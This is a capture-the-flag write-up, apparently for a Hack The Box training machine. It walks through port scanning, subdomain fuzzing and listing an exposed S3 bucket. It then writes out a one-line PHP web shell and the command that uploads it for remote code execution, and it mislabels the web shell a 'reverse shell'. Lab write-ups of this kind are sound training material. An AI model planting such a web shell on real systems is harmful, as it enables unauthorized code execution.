Vulnerability: Insecure File Upload in AWS S3 Bucket


Requirements:

  • aws cli - (sudo apt-get install awscli)


Steps:

  1. Conducting an Nmap scan to the given IP, will result to 2 open TCP ports (22 and 80).

     Nmap scan report for 10.129.113.143
 Host is up (0.57s latency).
 Not shown: 998 closed tcp ports (conn-refused)
 PORT   STATE SERVICE
 22/tcp open  ssh
 80/tcp open  http

    Note: Finding a port 80 means that there is a web application.

  2. Browsing the web app (http://ip), the domain/hostname can be found in the contact section in the email address (mail@thetoppers.htb) - thetoppers.htb. 2

  3. Given the IP address and the domain, add the ip address with the corresponding hostname in the /etc/hosts file. Edit the hosts file using sudo nano /etc/hosts/ or sudo subl /etc/hosts/.

     [snip]

 10.129.113.143   thetoppers.htb

  4. Now, the web application is accessible using http://thetoppers.htb/

  5. Enumerating subdomains using ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -fw 1832, s3.thetoppers.htb is present. And navigating to http://s3.thetoppers.htb/ results to: 5

    This is a Amazon S3 service

  6. Knowing this is an Amazon S3 service, there is a tool in command line called aws cli. Install aws cli in Kali.

  7. Configure the AWS using aws configure, inputting just ‘a’ will suffice. 7

  8. List the contents of the bucket using aws s3 ls s3://thetoppers.htb. 8

  9. Should specify the endpoint --endpoint http://thetoppers.htb. Now the contents of the S3 bucket is listed. Also PHP as scripting language is known that the application used (index.php). 9

  10. We can try uploading a malicious file using aws s3 cp s3://

  11. First, we need a malicious file (reverse shell).

    <?php system($_GET['cmd']); ?>

  12. Now we can upload the file using this command aws s3 --endpoint=http://s3.thetoppers.htb cp /home/kali/Desktop/transfer/shell.php s3://thetoppers.htb. 12

  13. Going back to the web application, a remote code execution is now possible. 13 14 15

Thanks for reading!


References:

  • https://app.hackthebox.com/starting-point
  • https://medium.com/quiknapp/fuzz-faster-with-ffuf-c18c031fc480